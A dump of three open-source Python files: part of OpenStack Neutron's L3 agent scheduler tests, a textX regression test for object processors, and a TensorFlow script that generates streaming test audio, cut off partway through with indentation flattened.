'neutron.db.db_base_plugin_v2.NeutronDbPluginV2' '.get_ports',
return_value=[dvr_port]):
sub_ids = self.dut.get_subnet_ids_on_router(self.adminContext,
r1['id'])
self.assertEqual(sub_ids.pop(),
dvr_port.get('fixed_ips').pop(0).get('subnet_id'))
def _test_check_ports_on_host_and_subnet_base(self, port_status):
dvr_port = {
'id': 'fake_id',
'device_id': 'r1',
'status': port_status,
'binding:host_id': 'thisHost',
'device_owner': 'compute:nova',
'fixed_ips': [
{
'subnet_id': '80947d4a-fbc8-484b-9f92-623a6bfcf3e0',
'ip_address': '10.10.10.1'
}
]
}
r1 = {
'id': 'r1',
'distributed': True,
}
with mock.patch(
'neutron.db.db_base_plugin_v2.NeutronDbPluginV2' '.get_ports',
return_value=[dvr_port]),\
mock.patch(
'neutron.manager.NeutronManager.get_service_plugins',
return_value=mock.Mock()),\
mock.patch('neutron.db.l3_db.L3_NAT_db_mixin.get_router',
return_value=r1),\
mock.patch('neutron.api.rpc.agentnotifiers.l3_rpc_agent_api'
'.L3AgentNotifyAPI'):
sub_ids = self.dut.get_subnet_ids_on_router(self.adminContext,
r1['id'])
result = self.dut.check_ports_on_host_and_subnet(
self.adminContext,
'thisHost', 'dvr_port1',
sub_ids)
self.assertTrue(result)
def test_check_ports_on_host_and_subnet_with_active_port(self):
self._test_check_ports_on_host_and_subnet_base('ACTIVE')
def test_check_ports_on_host_and_subnet_with_build_port(self):
self._test_check_ports_on_host_and_subnet_base('BUILD')
def test_check_ports_on_host_and_subnet_with_down_port(self):
self._test_check_ports_on_host_and_subnet_base('DOWN')
def _test_dvr_serviced_port_exists_on_subnet(self, port):
with mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.'
'get_ports', return_value=[port]):
result = self.dut.check_ports_on_host_and_subnet(
self.adminContext,
'thisHost',
'dvr1-intf-id',
'my-subnet-id')
self.assertTrue(result)
def test_dvr_serviced_vip_port_exists_on_subnet(self):
vip_port = {
'id': 'lbaas-vip-port1',
'device_id': 'vip-pool-id',
'status': 'ACTIVE',
'binding:host_id': 'thisHost',
'device_owner': constants.DEVICE_OWNER_LOADBALANCER,
'fixed_ips': [
{
'subnet_id': 'my-subnet-id',
'ip_address': '10.10.10.1'
}
]
}
self._test_dvr_serviced_port_exists_on_subnet(port=vip_port)
def _create_port(self, port_name, tenant_id, host, subnet_id, ip_address,
status='ACTIVE',
device_owner='compute:nova'):
return {
'id': port_name + '-port-id',
'tenant_id': tenant_id,
'device_id': port_name,
'device_owner': device_owner,
'status': status,
'binding:host_id': host,
'fixed_ips': [
{
'subnet_id': subnet_id,
'ip_address': ip_address
}
]
}
def test_dvr_deletens_if_no_port_no_routers(self):
# Delete a vm port, the port subnet has no router interface.
vm_tenant_id = 'tenant-1'
my_context = n_context.Context('user-1', vm_tenant_id, is_admin=False)
vm_port_host = 'compute-node-1'
vm_port = self._create_port(
'deleted-vm', vm_tenant_id, vm_port_host,
'shared-subnet', '10.10.10.3',
status='INACTIVE')
vm_port_id = vm_port['id']
fakePortDB = FakePortDB([vm_port])
with mock.patch.object(my_context,
'elevated',
return_value=self.adminContext),\
mock.patch(
'neutron.plugins.ml2.db.get_port_binding_host',
return_value=vm_port_host) as mock_get_port_binding_host,\
mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.'
'get_ports', side_effect=fakePortDB.get_ports),\
mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.'
'get_port', return_value=vm_port):
routers = self.dut.dvr_deletens_if_no_port(my_context, vm_port_id)
self.assertEqual([], routers)
mock_get_port_binding_host.assert_called_once_with(
self.adminContext.session, vm_port_id)
def test_dvr_deletens_if_no_ports_no_removeable_routers(self):
# A VM port is deleted, but the router can't be unscheduled from the
# compute node because there is another VM port present.
vm_tenant_id = 'tenant-1'
my_context = n_context.Context('user-1', vm_tenant_id, is_admin=False)
shared_subnet_id = '80947d4a-fbc8-484b-9f92-623a6bfcf3e0',
vm_port_host = 'compute-node-1'
dvr_port = self._create_port(
'dvr-router', 'admin-tenant', vm_port_host,
shared_subnet_id, '10.10.10.1',
device_owner=constants.DEVICE_OWNER_DVR_INTERFACE)
deleted_vm_port = self._create_port(
'deleted-vm', vm_tenant_id, vm_port_host,
shared_subnet_id, '10.10.10.3',
status='INACTIVE')
deleted_vm_port_id = deleted_vm_port['id']
running_vm_port = self._create_port(
'running-vn', 'tenant-2', vm_port_host,
shared_subnet_id, '10.10.10.33')
fakePortDB = FakePortDB([running_vm_port, deleted_vm_port, dvr_port])
vm_port_binding = {
'port_id': deleted_vm_port_id,
'host': vm_port_host
}
with mock.patch.object(my_context,
'elevated',
return_value=self.adminContext),\
mock.patch(
'neutron.plugins.ml2.db.get_port_binding_host',
return_value=vm_port_host) as mock_get_port_binding_host,\
mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.'
'get_port', side_effect=fakePortDB.get_port),\
mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.'
'get_ports', side_effect=fakePortDB.get_ports) as\
mock_get_ports,\
mock.patch('neutron.plugins.ml2.db.'
'get_dvr_port_binding_by_host',
return_value=vm_port_binding) as\
mock_get_dvr_port_binding_by_host:
routers = self.dut.dvr_deletens_if_no_port(
my_context, deleted_vm_port_id)
self.assertEqual([], routers)
mock_get_port_binding_host.assert_called_once_with(
self.adminContext.session, deleted_vm_port_id)
self.assertTrue(mock_get_ports.called)
self.assertFalse(mock_get_dvr_port_binding_by_host.called)
def _test_dvr_deletens_if_no_ports_delete_routers(self,
vm_tenant,
router_tenant):
class FakeAgent(object):
def __init__(self, id, host, agent_type):
self.id = id
self.host = host
self.agent_type = agent_type
my_context = n_context.Context('user-1', vm_tenant, is_admin=False)
shared_subnet_id = '80947d4a-fbc8-484b-9f92-623a6bfcf3e0',
vm_port_host = 'compute-node-1'
router_id = 'dvr-router'
dvr_port = self._create_port(
router_id, router_tenant, vm_port_host,
shared_subnet_id, '10.10.10.1',
device_owner=constants.DEVICE_OWNER_DVR_INTERFACE)
dvr_port_id = dvr_port['id']
deleted_vm_port = self._create_port(
'deleted-vm', vm_tenant, vm_port_host,
shared_subnet_id, '10.10.10.3',
status='INACTIVE')
deleted_vm_port_id = deleted_vm_port['id']
running_vm_port = self._create_port(
'running-vn', vm_tenant, 'compute-node-2',
shared_subnet_id, '10.10.10.33')
fakePortDB = FakePortDB([running_vm_port, dvr_port, deleted_vm_port])
dvr_port_binding = {
'port_id': dvr_port_id, 'host': vm_port_host
}
agent_id = 'l3-agent-on-compute-node-1'
l3_agent_on_vm_host = FakeAgent(agent_id,
vm_port_host,
constants.AGENT_TYPE_L3)
with mock.patch.object(my_context,
'elevated',
return_value=self.adminContext),\
mock.patch(
'neutron.plugins.ml2.db.get_port_binding_host',
return_value=vm_port_host) as mock_get_port_binding_host,\
mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.'
'get_port', side_effect=fakePortDB.get_port),\
mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.'
'get_ports', side_effect=fakePortDB.get_ports) as\
mock_get_ports,\
mock.patch('neutron.plugins.ml2.db.'
'get_dvr_port_binding_by_host',
return_value=dvr_port_binding) as\
mock_get_dvr_port_binding_by_host,\
mock.patch('neutron.db.agents_db.AgentDbMixin.'
'_get_agent_by_type_and_host',
return_value=l3_agent_on_vm_host):
routers = self.dut.dvr_deletens_if_no_port(
my_context, deleted_vm_port_id)
expected_router = {
'router_id': router_id,
'host': vm_port_host,
'agent_id': agent_id
}
self.assertEqual([expected_router], routers)
mock_get_port_binding_host.assert_called_once_with(
self.adminContext.session, deleted_vm_port_id)
self.assertTrue(mock_get_ports.called)
mock_get_dvr_port_binding_by_host.assert_called_once_with(
my_context.session, dvr_port_id, vm_port_host)
def test_dvr_deletens_if_no_ports_delete_admin_routers(self):
# test to see whether the last VM using a router created
# by the admin will be unscheduled on the compute node
self._test_dvr_deletens_if_no_ports_delete_routers(
'tenant-1', 'admin-tenant')
def test_dvr_deletens_if_no_ports_delete_tenant_routers(self):
# test to see whether the last VM using a tenant's private
# router will be unscheduled on the compute node
self._test_dvr_deletens_if_no_ports_delete_routers(
'tenant-1', 'tenant-1')
def test_dvr_serviced_dhcp_port_exists_on_subnet(self):
dhcp_port = {
'id': 'dhcp-port1',
'device_id': 'dhcp-net-id',
'status': 'ACTIVE',
'binding:host_id': 'thisHost',
'device_owner': constants.DEVICE_OWNER_DHCP,
'fixed_ips': [
{
'subnet_id': 'my-subnet-id',
'ip_address': '10.10.10.2'
}
]
}
self._test_dvr_serviced_port_exists_on_subnet(port=dhcp_port)
def _prepare_schedule_snat_tests(self):
agent = agents_db.Agent()
agent.admin_state_up = True
agent.heartbeat_timestamp = timeutils.utcnow()
router = {
'id': 'foo_router_id',
'distributed': True,
'external_gateway_info': {
'network_id': str(uuid.uuid4()),
'enable_snat': True
}
}
return agent, router
def test_schedule_snat_router_duplicate_entry(self):
self._prepare_schedule_snat_tests()
with mock.patch.object(self.dut, 'get_l3_agents'),\
mock.patch.object(self.dut, 'get_snat_candidates'),\
mock.patch.object(
self.dut,
'bind_snat_servicenode',
side_effect=db_exc.DBDuplicateEntry()) as mock_bind_snat,\
mock.patch.object(
self.dut,
'bind_dvr_router_servicenode') as mock_bind_dvr:
self.dut.schedule_snat_router(self.adminContext, 'foo', 'bar')
self.assertTrue(mock_bind_snat.called)
self.assertFalse(mock_bind_dvr.called)
def test_schedule_snat_router_return_value(self):
agent, router = self._prepare_schedule_snat_tests()
with mock.patch.object(self.dut, 'get_l3_agents'),\
mock.patch.object(
self.dut,
'get_snat_candidates') as mock_snat_canidates,\
mock.patch.object(self.dut,
'bind_snat_servicenode') as mock_bind_snat,\
mock.patch.object(
self.dut,
'bind_dvr_router_servicenode') as mock_bind_dvr:
mock_snat_canidates.return_value = [agent]
mock_bind_snat.return_value = [agent]
mock_bind_dvr.return_value = [agent]
chosen_agent = self.dut.schedule_snat_router(
self.adminContext, 'foo_router_id', router)
self.assertEqual(chosen_agent, [agent])
def test_schedule_router_unbind_snat_servicenode_negativetest(self):
router = {
'id': 'foo_router_id',
'distributed': True
}
with mock.patch.object(self.dut, 'get_router') as mock_rd,\
mock.patch.object(self.dut,
'get_snat_bindings') as mock_snat_bind,\
mock.patch.object(self.dut,
'unbind_snat_servicenode') as mock_unbind:
mock_rd.return_value = router
mock_snat_bind.return_value = False
self.dut.schedule_snat_router(
self.adminContext, 'foo_router_id', router)
self.assertFalse(mock_unbind.called)
def test_schedule_snat_router_with_snat_candidates(self):
agent, router = self._prepare_schedule_snat_tests()
with mock.patch.object(query.Query, 'first') as mock_query,\
mock.patch.object(self.dut, 'get_l3_agents') as mock_agents,\
mock.patch.object(self.dut,
'get_snat_candidates') as mock_candidates,\
mock.patch.object(self.dut, 'get_router') as mock_rd,\
mock.patch.object(self.dut, 'bind_dvr_router_servicenode'),\
mock.patch.object(self.dut,
'bind_snat_servicenode') as mock_bind:
mock_rd.return_value = router
mock_query.return_value = []
mock_agents.return_value = [agent]
mock_candidates.return_value = [agent]
self.dut.schedule_snat_router(
self.adminContext, 'foo_router_id', mock.ANY)
mock_bind.assert_called_once_with(
self.adminContext, 'foo_router_id', [agent])
def test_unbind_snat_servicenode(self):
router_id = 'foo_router_id'
core_plugin = mock.PropertyMock()
type(self.dut)._core_plugin = core_plugin
(self.dut._core_plugin.get_ports_on_host_by_subnet.
return_value) = []
core_plugin.reset_mock()
l3_notifier = mock.PropertyMock()
type(self.dut).l3_rpc_notifier = l3_notifier
binding = l3_dvrscheduler_db.CentralizedSnatL3AgentBinding(
router_id=router_id, l3_agent_id='foo_l3_agent_id',
l3_agent=agents_db.Agent())
with mock.patch.object(query.Query, 'one') as mock_query,\
mock.patch.object(self.adminContext.session,
'delete') as mock_session,\
mock.patch.object(query.Query, 'delete') as mock_delete,\
mock.patch.object(
self.dut,
'get_subnet_ids_on_router') as mock_get_subnets:
mock_query.return_value = binding
mock_get_subnets.return_value = ['foo_subnet_id']
self.dut.unbind_snat_servicenode(self.adminContext, router_id)
mock_get_subnets.assert_called_with(self.adminContext, router_id)
self.assertTrue(mock_session.call_count)
self.assertTrue(mock_delete.call_count)
core_plugin.assert_called_once_with()
l3_notifier.assert_called_once_with()
class L3HAPlugin(db_v2.NeutronDbPluginV2,
l3_hamode_db.L3_HA_NAT_db_mixin,
l3_hascheduler_db.L3_HA_scheduler_db_mixin):
supported_extension_aliases = ["l3-ha"]
class L3HATestCaseMixin(testlib_api.SqlTestCase,
L3SchedulerBaseMixin):
def setUp(self):
super(L3HATestCaseMixin, self).setUp()
self.adminContext = n_context.get_admin_context()
self.plugin = L3HAPlugin()
self.setup_coreplugin('neutron.plugins.ml2.plugin.Ml2Plugin')
mock.patch.object(l3_hamode_db.L3_HA_NAT_db_mixin,
'_notify_ha_interfaces_updated').start()
cfg.CONF.set_override('max_l3_agents_per_router', 0)
self.plugin.router_scheduler = importutils.import_object(
'neutron.scheduler.l3_agent_scheduler.ChanceScheduler'
)
self._register_l3_agents()
def _create_ha_router(self, ha=True, tenant_id='tenant1'):
self.adminContext.tenant_id = tenant_id
router = {'name': 'router1', 'admin_state_up': True}
if ha is not None:
router['ha'] = ha
return self.plugin.create_router(self.adminContext,
{'router': router})
class L3_HA_scheduler_db_mixinTestCase(L3HATestCaseMixin):
def _register_l3_agents(self, plugin=None):
super(L3_HA_scheduler_db_mixinTestCase,
self)._register_l3_agents(plugin=plugin)
self.agent3 = helpers.register_l3_agent(host='host_3')
self.agent_id3 = self.agent3.id
self.agent4 = helpers.register_l3_agent(host='host_4')
self.agent_id4 = self.agent4.id
def test_get_ha_routers_l3_agents_count(self):
router1 = self._create_ha_router()
router2 = self._create_ha_router()
router3 = self._create_ha_router(ha=False)
self.plugin.schedule_router(self.adminContext, router1['id'])
self.plugin.schedule_router(self.adminContext, router2['id'])
self.plugin.schedule_router(self.adminContext, router3['id'])
result = self.plugin.get_ha_routers_l3_agents_count(
self.adminContext).all()
self.assertEqual(2, len(result))
self.assertIn((router1['id'], router1['tenant_id'], 4), result)
self.assertIn((router2['id'], router2['tenant_id'], 4), result)
self.assertNotIn((router3['id'], router3['tenant_id'], mock.ANY),
result)
def test_get_ordered_l3_agents_by_num_routers(self):
router1 = self._create_ha_router()
router2 = self._create_ha_router()
router3 = self._create_ha_router(ha=False)
router4 = self._create_ha_router(ha=False)
# Agent 1 will host 0 routers, agent 2 will host 1, agent 3 will
# host 2, and agent 4 will host 3.
self.plugin.schedule_router(self.adminContext, router1['id'],
candidates=[self.agent2, self.agent4])
self.plugin.schedule_router(self.adminContext, router2['id'],
candidates=[self.agent3, self.agent4])
self.plugin.schedule_router(self.adminContext, router3['id'],
candidates=[self.agent3])
self.plugin.schedule_router(self.adminContext, router4['id'],
candidates=[self.agent4])
agent_ids = [self.agent_id1, self.agent_id2, self.agent_id3,
self.agent_id4]
result = self.plugin.get_l3_agents_ordered_by_num_routers(
self.adminContext, agent_ids)
self.assertEqual(agent_ids, [record['id'] for record in result])
class L3AgentSchedulerDbMixinTestCase(L3HATestCaseMixin):
def test_reschedule_ha_routers_from_down_agents(self):
router = self._create_ha_router()
self.plugin.schedule_router(self.adminContext, router['id'])
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [router['id']],
admin_state_up=True)
self.assertEqual(2, len(agents))
self._set_l3_agent_dead(self.agent_id1)
with mock.patch.object(self.plugin, 'reschedule_router') as reschedule:
self.plugin.reschedule_routers_from_down_agents()
self.assertFalse(reschedule.called)
def test_list_l3_agents_hosting_ha_router(self):
router = self._create_ha_router()
self.plugin.schedule_router(self.adminContext, router['id'])
agents = self.plugin.list_l3_agents_hosting_router(
self.adminContext, router['id'])['agents']
for agent in agents:
self.assertEqual('standby', agent['ha_state'])
self.plugin.update_routers_states(
self.adminContext, {router['id']: 'active'}, self.agent1.host)
agents = self.plugin.list_l3_agents_hosting_router(
self.adminContext, router['id'])['agents']
for agent in agents:
expected_state = ('active' if agent['host'] == self.agent1.host
else 'standby')
self.assertEqual(expected_state, agent['ha_state'])
def test_list_l3_agents_hosting_legacy_router(self):
router = self._create_ha_router(ha=False)
self.plugin.schedule_router(self.adminContext, router['id'])
agents = self.plugin.list_l3_agents_hosting_router(
self.adminContext, router['id'])['agents']
for agent in agents:
self.assertIsNone(agent['ha_state'])
def test_get_agents_dict_for_router_unscheduled_returns_empty_list(self):
self.assertEqual({'agents': []},
self.plugin._get_agents_dict_for_router([]))
class L3HAChanceSchedulerTestCase(L3HATestCaseMixin):
def test_scheduler_with_ha_enabled(self):
router = self._create_ha_router()
self.plugin.schedule_router(self.adminContext, router['id'])
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [router['id']],
admin_state_up=True)
self.assertEqual(2, len(agents))
for agent in agents:
sync_data = self.plugin.get_ha_sync_data_for_host(
self.adminContext, router_ids=[router['id']],
host=agent.host)
self.assertEqual(1, len(sync_data))
interface = sync_data[0][constants.HA_INTERFACE_KEY]
self.assertIsNotNone(interface)
def test_auto_schedule(self):
router = self._create_ha_router()
self.plugin.auto_schedule_routers(
self.adminContext, self.agent1.host, None)
self.plugin.auto_schedule_routers(
self.adminContext, self.agent2.host, None)
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [router['id']])
self.assertEqual(2, len(agents))
def test_auto_schedule_specific_router_when_agent_added(self):
self._auto_schedule_when_agent_added(True)
def test_auto_schedule_all_routers_when_agent_added(self):
self._auto_schedule_when_agent_added(False)
def _auto_schedule_when_agent_added(self, specific_router):
router = self._create_ha_router()
self.plugin.schedule_router(self.adminContext, router['id'])
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [router['id']],
admin_state_up=True)
self.assertEqual(2, len(agents))
agent_ids = [agent['id'] for agent in agents]
self.assertIn(self.agent_id1, agent_ids)
self.assertIn(self.agent_id2, agent_ids)
agent = helpers.register_l3_agent(host='host_3')
self.agent_id3 = agent.id
routers_to_auto_schedule = [router['id']] if specific_router else []
self.plugin.auto_schedule_routers(self.adminContext,
'host_3',
routers_to_auto_schedule)
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [router['id']],
admin_state_up=True)
self.assertEqual(3, len(agents))
# Simulate agent restart to make sure we don't try to re-bind
self.plugin.auto_schedule_routers(self.adminContext,
'host_3',
routers_to_auto_schedule)
def test_scheduler_with_ha_enabled_not_enough_agent(self):
r1 = self._create_ha_router()
self.plugin.schedule_router(self.adminContext, r1['id'])
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r1['id']],
admin_state_up=True)
self.assertEqual(2, len(agents))
r2 = self._create_ha_router()
self._set_l3_agent_admin_state(self.adminContext,
self.agent_id2, False)
self.plugin.schedule_router(self.adminContext, r2['id'])
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r2['id']],
admin_state_up=True)
self.assertEqual(0, len(agents))
self._set_l3_agent_admin_state(self.adminContext,
self.agent_id2, True)
class L3HALeastRoutersSchedulerTestCase(L3HATestCaseMixin):
def _register_l3_agents(self, plugin=None):
super(L3HALeastRoutersSchedulerTestCase,
self)._register_l3_agents(plugin=plugin)
agent = helpers.register_l3_agent(host='host_3')
self.agent_id3 = agent.id
agent = helpers.register_l3_agent(host='host_4')
self.agent_id4 = agent.id
def setUp(self):
super(L3HALeastRoutersSchedulerTestCase, self).setUp()
self.plugin.router_scheduler = importutils.import_object(
'neutron.scheduler.l3_agent_scheduler.LeastRoutersScheduler'
)
def test_scheduler(self):
cfg.CONF.set_override('max_l3_agents_per_router', 2)
# disable the third agent to be sure that the router will
# be scheduled of the two firsts
self._set_l3_agent_admin_state(self.adminContext,
self.agent_id3, False)
self._set_l3_agent_admin_state(self.adminContext,
self.agent_id4, False)
r1 = self._create_ha_router()
self.plugin.schedule_router(self.adminContext, r1['id'])
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r1['id']],
admin_state_up=True)
self.assertEqual(2, len(agents))
agent_ids = [agent['id'] for agent in agents]
self.assertIn(self.agent_id1, agent_ids)
self.assertIn(self.agent_id2, agent_ids)
self._set_l3_agent_admin_state(self.adminContext,
self.agent_id3, True)
self._set_l3_agent_admin_state(self.adminContext,
self.agent_id4, True)
r2 = self._create_ha_router()
self.plugin.schedule_router(self.adminContext, r2['id'])
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r2['id']],
admin_state_up=True)
self.assertEqual(2, len(agents))
agent_ids = [agent['id'] for agent in agents]
self.assertIn(self.agent_id3, agent_ids)
self.assertIn(self.agent_id4, agent_ids)
class TestGetL3AgentsWithAgentModeFilter(testlib_api.SqlTestCase,
L3SchedulerBaseMixin):
"""Test cases to test get_l3_agents.
This class tests the L3AgentSchedulerDbMixin.get_l3_agents()
for the 'agent_mode' filter with various values.
5 l3 agents are registered in the order - legacy, dvr_snat, dvr, fake_mode
and legacy
"""
scenarios = [
('no filter',
dict(agent_modes=[],
expected_agent_modes=['legacy', 'dvr_snat', 'dvr',
'fake_mode', 'legacy'])),
('legacy',
dict(agent_modes=['legacy'],
expected_agent_modes=['legacy', 'legacy'])),
('dvr_snat',
dict(agent_modes=['dvr_snat'],
expected_agent_modes=['dvr_snat'])),
('dvr ',
dict(agent_modes=['dvr'],
expected_agent_modes=['dvr'])),
('legacy and dvr snat',
dict(agent_modes=['legacy', 'dvr_snat', 'legacy'],
expected_agent_modes=['legacy', 'dvr_snat', 'legacy'])),
('legacy and dvr',
dict(agent_modes=['legacy', 'dvr'],
expected_agent_modes=['legacy', 'dvr', 'legacy'])),
('dvr_snat and dvr',
dict(agent_modes=['dvr_snat', 'dvr'],
expected_agent_modes=['dvr_snat', 'dvr'])),
('legacy, dvr_snat and dvr',
dict(agent_modes=['legacy', 'dvr_snat', 'dvr'],
expected_agent_modes=['legacy', 'dvr_snat', 'dvr',
'legacy'])),
('invalid',
dict(agent_modes=['invalid'],
expected_agent_modes=[])),
]
def setUp(self):
super(TestGetL3AgentsWithAgentModeFilter, self).setUp()
self.plugin = L3HAPlugin()
self.setup_coreplugin('neutron.plugins.ml2.plugin.Ml2Plugin')
self.adminContext = n_context.get_admin_context()
hosts = ['host_1', 'host_2', 'host_3', 'host_4', 'host_5']
agent_modes = ['legacy', 'dvr_snat', 'dvr', 'fake_mode', 'legacy']
for host, agent_mode in zip(hosts, agent_modes):
helpers.register_l3_agent(host, agent_mode)
def _get_agent_mode(self, agent):
agent_conf = self.plugin.get_configuration_dict(agent)
return agent_conf.get('agent_mode', 'None')
def test_get_l3_agents(self):
l3_agents = self.plugin.get_l3_agents(
self.adminContext, filters={'agent_modes': self.agent_modes})
self.assertEqual(len(self.expected_agent_modes), len(l3_agents))
returned_agent_modes = [self._get_agent_mode(agent)
for agent in l3_agents]
self.assertEqual(self.expected_agent_modes, returned_agent_modes)
|
apache-2.0
|
igordejanovic/textX
|
tests/functional/regressions/test_issue_80_object_processors.py
|
1
|
1738
|
from __future__ import unicode_literals
from textx.metamodel import metamodel_from_str
call_counter = 0
grammar1 = """
foo:
'foo' m_formula = Formula
;
Formula:
( values=FormulaExpression values='+' ( values=FormulaExpression)* )
;
FormulaExpression:
values=bar
;
bar:
m_id=/[a-f0-9]+/
;
"""
grammar2 = u"""
foo:
'foo' m_formula = Formula
;
Formula:
( values=FormulaExpression ( values=FormulaExpression)* )
;
FormulaExpression:
values=bar
;
bar:
m_id=/[a-f0-9]+/
;
"""
grammar3 = u"""
foo:
'foo' m_formula = Formula
;
Formula:
( values=FormulaExpression values='+' ( values=FormulaExpression)* )
;
FormulaExpression:
values=/[a-f0-9]+/
;
"""
def default_processor(obj):
global call_counter
call_counter += 1
print("PROCESSING " + str(obj.__class__.__name__))
def parse_str(grammar, lola_str):
lola_str = lola_str
obj_processors = {
"foo": default_processor,
"Formula": default_processor,
"FormulaExpression": default_processor,
"bar": default_processor,
}
meta_model = metamodel_from_str(grammar, ignore_case=True,
auto_init_attributes=False)
meta_model.register_obj_processors(obj_processors)
model = meta_model.model_from_str(lola_str)
return model
def test_issue_80_object_processors():
global call_counter
test_str = "foo a323 + a111"
call_counter = 0
parse_str(grammar1, test_str)
assert call_counter == 6
test_str = "foo a323 a111"
call_counter = 0
parse_str(grammar2, test_str)
assert call_counter == 6
test_str = "foo a323 + a111"
call_counter = 0
parse_str(grammar3, test_str)
assert call_counter == 4
|
mit
|
ppwwyyxx/tensorflow
|
tensorflow/examples/speech_commands/generate_streaming_test_wav.py
|
23
|
11074
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Saves out a .wav file with synthesized conversational data and labels.
The best way to estimate the real-world performance of an audio recognition
model is by running it against a continuous stream of data, the way that it
would be used in an application. Training evaluations are only run against
discrete individual samples, so the results aren't as realistic.
To make it easy to run evaluations against audio streams, this script uses
samples from the testing partition of the data set, mixes them in at random
positions together with background noise, and saves out the result as one long
audio file.
Here's an example of generating a test file:
bazel run tensorflow/examples/speech_commands:generate_streaming_test_wav -- \
--data_dir=/tmp/my_wavs --background_dir=/tmp/my_backgrounds \
--background_volume=0.1 --test_duration_seconds=600 \
--output_audio_file=/tmp/streaming_test.wav \
--output_labels_file=/tmp/streaming_test_labels.txt
Once you've created a streaming audio file, you can then use the
test_streaming_accuracy tool to calculate accuracy metrics for a model.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import math
import sys
import numpy as np
import tensorflow as tf
import input_data
import models
FLAGS = None
def mix_in_audio_sample(track_data, track_offset, sample_data, sample_offset,
clip_duration, sample_volume, ramp_in, ramp_out):
"""Mixes the sample data into the main track at the specified offset.
Args:
track_data: Numpy array holding main audio data. Modified in-place.
track_offset: Where to mix the sample into the main track.
sample_data: Numpy array of audio data to mix into the main track.
sample_offset: Where to start in the audio sample.
clip_duration: How long the sample segment is.
sample_volume: Loudness to mix the sample in at.
ramp_in: Length in samples of volume increase stage.
ramp_out: Length in samples of volume decrease stage.
"""
ramp_out_index = clip_duration - ramp_out
track_end = min(track_offset + clip_duration, track_data.shape[0])
track_end = min(track_end,
track_offset + (sample_data.shape[0] - sample_offset))
sample_range = track_end - track_offset
for i in range(sample_range):
if i < ramp_in:
envelope_scale = i / ramp_in
elif i > ramp_out_index:
envelope_scale = (clip_duration - i) / ramp_out
else:
envelope_scale = 1
sample_input = sample_data[sample_offset + i]
track_data[track_offset
+ i] += sample_input * envelope_scale * sample_volume
def main(_):
words_list = input_data.prepare_words_list(FLAGS.wanted_words.split(','))
model_settings = models.prepare_model_settings(
len(words_list), FLAGS.sample_rate, FLAGS.clip_duration_ms,
FLAGS.window_size_ms, FLAGS.window_stride_ms, FLAGS.feature_bin_count,
'mfcc')
audio_processor = input_data.AudioProcessor(
'', FLAGS.data_dir, FLAGS.silence_percentage, 10,
FLAGS.wanted_words.split(','), FLAGS.validation_percentage,
FLAGS.testing_percentage, model_settings, FLAGS.data_dir)
output_audio_sample_count = FLAGS.sample_rate * FLAGS.test_duration_seconds
output_audio = np.zeros((output_audio_sample_count,), dtype=np.float32)
# Set up background audio.
background_crossover_ms = 500
background_segment_duration_ms = (
FLAGS.clip_duration_ms + background_crossover_ms)
background_segment_duration_samples = int(
(background_segment_duration_ms * FLAGS.sample_rate) / 1000)
background_segment_stride_samples = int(
(FLAGS.clip_duration_ms * FLAGS.sample_rate) / 1000)
background_ramp_samples = int(
((background_crossover_ms / 2) * FLAGS.sample_rate) / 1000)
# Mix the background audio into the main track.
how_many_backgrounds = int(
math.ceil(output_audio_sample_count / background_segment_stride_samples))
for i in range(how_many_backgrounds):
output_offset = int(i * background_segment_stride_samples)
background_index = np.random.randint(len(audio_processor.background_data))
background_samples = audio_processor.background_data[background_index]
background_offset = np.random.randint(
0, len(background_samples) - model_settings['desired_samples'])
background_volume = np.random.uniform(0, FLAGS.background_volume)
mix_in_audio_sample(output_audio, output_offset, background_samples,
background_offset, background_segment_duration_samples,
background_volume, background_ramp_samples,
background_ramp_samples)
# Mix the words into the main track, noting their labels and positions.
output_labels = []
word_stride_ms = FLAGS.clip_duration_ms + FLAGS.word_gap_ms
word_stride_samples = int((word_stride_ms * FLAGS.sample_rate) / 1000)
clip_duration_samples = int(
(FLAGS.clip_duration_ms * FLAGS.sample_rate) / 1000)
word_gap_samples = int((FLAGS.word_gap_ms * FLAGS.sample_rate) / 1000)
how_many_words = int(
math.floor(output_audio_sample_count / word_stride_samples))
all_test_data, all_test_labels = audio_processor.get_unprocessed_data(
-1, model_settings, 'testing')
for i in range(how_many_words):
output_offset = (
int(i * word_stride_samples) + np.random.randint(word_gap_samples))
output_offset_ms = (output_offset * 1000) / FLAGS.sample_rate
is_unknown = np.random.randint(100) < FLAGS.unknown_percentage
if is_unknown:
wanted_label = input_data.UNKNOWN_WORD_LABEL
else:
wanted_label = words_list[2 + np.random.randint(len(words_list) - 2)]
test_data_start = np.random.randint(len(all_test_data))
found_sample_data = None
index_lookup = np.arange(len(all_test_data), dtype=np.int32)
np.random.shuffle(index_lookup)
for test_data_offset in range(len(all_test_data)):
test_data_index = index_lookup[(
test_data_start + test_data_offset) % len(all_test_data)]
current_label = all_test_labels[test_data_index]
if current_label == wanted_label:
found_sample_data = all_test_data[test_data_index]
break
mix_in_audio_sample(output_audio, output_offset, found_sample_data, 0,
clip_duration_samples, 1.0, 500, 500)
output_labels.append({'label': wanted_label, 'time': output_offset_ms})
